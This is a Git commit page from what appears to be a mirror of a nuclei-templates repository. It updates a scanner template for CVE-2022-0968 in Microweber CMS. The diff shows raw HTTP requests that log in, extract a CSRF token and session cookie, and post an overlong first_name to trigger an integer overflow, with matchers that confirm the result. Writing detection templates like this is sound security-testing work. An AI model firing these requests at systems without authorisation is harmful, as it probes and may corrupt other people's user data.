daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-0968.yaml

patch-1
amit-jd 2022-07-27 13:30:19 +05:30 committed by GitHub
parent e06700004b
commit 1dcdb2dedb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
cves/2022/CVE-2022-0968.yaml
View File

@ -13,11 +13,11 @@ info:
cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
cvss-score: 7.2
cwe-id: CWE-190
tags: overflow, microweber, CMS
tags: cve,cve2022,overflow,microweber,CMS
requests:
- raw:
- |-
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@ -29,13 +29,13 @@ requests:
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
- |+
- |
GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}}
- |-
- |
POST /api/user/2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -47,11 +47,11 @@ requests:
req-condition: true
cookie-reuse: true
extractors:
- type: kval
part: header
- type: json
part: body
name: csrf_token
kval:
- XSRF-TOKEN
json:
- .token
internal: true
- type: kval
@ -83,17 +83,12 @@ requests:
internal: true
group: 1
regex:
- '<input type="email" class="form-control" name="email" value="(.*)">'
- type: dsl
part: body
name: response
dsl:
- body_4
- '<input type="email" class="form-control" name="email" value="(.*)">'
matchers:
- type: dsl
dsl:
- 'contains(body_4,"first_name":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")'
- 'status_code_4==200'
condition: and
- 'contains(all_headers_4,"application/json")'
condition: and